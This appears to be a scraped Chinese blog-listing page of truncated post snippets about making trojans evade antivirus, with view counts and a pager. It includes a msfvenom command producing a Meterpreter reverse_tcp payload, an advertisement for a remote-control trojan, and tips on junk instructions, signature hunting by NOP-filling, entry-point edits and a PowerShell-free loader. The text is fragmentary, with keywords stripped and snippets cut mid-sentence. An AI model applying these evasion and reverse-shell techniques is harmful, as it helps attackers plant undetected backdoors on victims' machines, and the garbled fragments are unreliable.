经测试,这种方式无法攻击windows10,因为它有defender,我们一旦运行起来,defender就会/x/meterpreter/reverse_tcp LPORT=13338 LHOST=192....
原创 2022-02-28 11:07:56
277阅读
测试
转载 2012-02-14 07:30:59
310阅读
经测试,这种方式无法攻击windows10,因为它有defender,我们一旦运行起来,defender就会把它干死不过,在电脑上装了360安全卫士的情况下,defender会被抑制,我们的后门就可以正常运行了先使用msfvenom生成shellcodemsfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=13338 LHOST=192....
原创 2021-06-29 11:08:00
978阅读
2010.2011最新终极远程控制软件[远程控制][所有软、360安全卫士7.3-7.5无提示] 兼容性:支持Win9X,Win2000,Windows XP,Windows 2003,windows 7等32位-64位操作系统,兼容性更强.用途更广. 基本介绍:【1】 控制端与服务端都采用IOCP模型,数据传输采用zlib压缩方式.【2】 稳定快速,上线数量无上限
原创 2010-10-18 12:42:37
2409阅读
干货|-C加载器尝试哆啦安全|知识星球上线啦(优惠券活动即将到期)!!!微信公众号
原创 2021-12-14 09:21:43
836阅读
通过代码直接调用System.Management,替代powershell.exe c#代码,保存为1.cs: using System.Collections.ObjectModel; using System.Management.Automation; using System.Manage ...
转载 2021-07-17 23:39:00
1506阅读
2评论
(一)、应注意的事项:  1.的测试(在线杀毒、杀毒软件上报、世界反毒网:http://www.virustotal.com/zh-cn/) 在这里我建议大家不要上传自己的马到这样的网站上去.一上传不要多久就会被杀了.大家还是把软装在自己的电脑,然后测试比较好.  2.一个好的杀木马要过文件、内存、行为、主动防御等一些专杀软件.  3.目前一些常用的软有
原创 2009-07-25 22:12:58
2182阅读
2评论
一.关于的来源 为了让我们的木马在各种杀毒软件的威胁下活的更久. 二.什么叫和查杀 可分为二类: 1.文件和查杀:不运行程序用杀毒软件进行对该程序的扫描,所得结果。 2.内存的和查杀:判断的方法1运行后,用杀毒软件的内存查杀功能. 2用OD载入, 一.关于的来源 为了让我们的木马在各种杀毒软件的威胁下活的更久. 二.什么叫和查杀 可分为二类: 1.文件和查杀:
转载 2010-02-13 02:48:28
652阅读
一: 灰鸽子方法大全 在所有的版本中,黑防的鸽子算是比较好做的了,今天在这里,我就用他做案例 一,最经典的OD一半一半定位法 我们把整个黑色标记的区域看成是没有修改的木马代码把它从中间切平均分成两半,把其中的一半用nop 填充掉,再用瑞星内存,如果杀掉了就说明特征代码在我们没有nop 掉的一半,没有到就说明我们刚刚nop的一半中含有特征代码。 所演示的情况是特征代码在没有no
转载 精选 2009-07-15 21:36:01
6942阅读
使用python一键生成webshell
源码C++基础 都一样 正常安装就行 有的是这个版本 这三个解压到 覆盖 因为之前安装过了 就看下路径吧 最后 提一下Assist 安装需要 进入那个vc98 目录去 安装破解 如果缺dll 那就下一个加载就ok  
原创 2021-08-16 09:43:41
878阅读
今天送上经典花指令 注:编写花指令,可参考以下成双指令,可任意自由组合.达到效果. push ebp pop ebp push eax pop eax push esp pop esp push 0 push 0 push 10 -------其中数字可以任意,注意与下面对应 push -10 nop -----------可任意在中间添加 与它等效的: mov EDI,EDIadd esp
原创 2010-09-30 13:23:52
2186阅读
假设我们的特征码定位在MessageBoxA函数的地址(只是举个例子,一般这个函数不会被杀,其他函数也类似方法)那么我们到源码里面发现,我们在PrintMsg函数中调用了这个API函数,那么我们就要对他进行处理。对于输入表被查杀我们一般的处理方法是修改函数的调用方式,比如采用dll动态调用,通过上图,我们知道我们是以非unicode方式编译的MessageBox,他对应的非Unicode的函数为MessageBoxA,同时我们也得到这个MessageBoxA函数在UER32.dll文件中。那么我们修改MessageBox的调用方式为dll的动态调用,其代码修改成:typedef int (WI
转载 2012-10-31 09:03:00
300阅读
2评论
PHP小马<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">            <HTML><HEAD>            <META http-equ
原创 2008-12-15 00:00:00
1262阅读
一.入口点加1法: 1.用到工具:PEditor 2.特点:非常简单实用,但有时还会被卡巴查杀. 3.操作要点:用PEditor打开无壳木马程序,把原入口点加1即可. 二.变化入口地址法: 1.用到工具:OllyDbg,PEditor 2.特点:操作也比较容易,而且效果比入口点加1点要佳. 3.操作要点:用OD载入无壳的木马程序,把入口点的前二句移到零区域去执行,然后 又跳回
转载 精选 2009-10-15 10:19:17
965阅读
测试-专题KaliLinux——shellcode-payload分离反安全软件 anti-virus security software都是特别针对PE头文件的查杀当payload文件越
原创 2022-04-29 21:48:26
220阅读
今天有一点想你,其实,不止一点,其实,不止今天。。。​----网易云热评一、简介快速生成exe可执行文件,目前拥有三种的方法二、下载及安装1、下载到本地git clonehttps://github.com/lengjibo/FourEye.git2、进入该文件夹cd FourEye3、安装需要的python库pip install -r requirements.txt
原创 2022-12-27 14:26:13
780阅读
这里仅用反弹powershell演示,大家可以发挥脑洞自创反弹shell五部曲:1:确定想法2:实现框架3:增加保护4:启动木马5:维持会话或提权1|2一,确定想法用python服务器与客户端的原理制作反弹shell的控制端与被控制端,最后执行在会话中执行恶意命令来获取一个稳定的powershell记:控制端两次使用的端口不能相同1|3二,实现框架这里我们需要两个文件受害者运行的恶意程序在第一
原创 9月前
0阅读
01前言最近玩了玩,学习了很多的技巧
d3
3c
5e
原创 10月前
0阅读
  • 1
  • 2
  • 3
  • 4
  • 5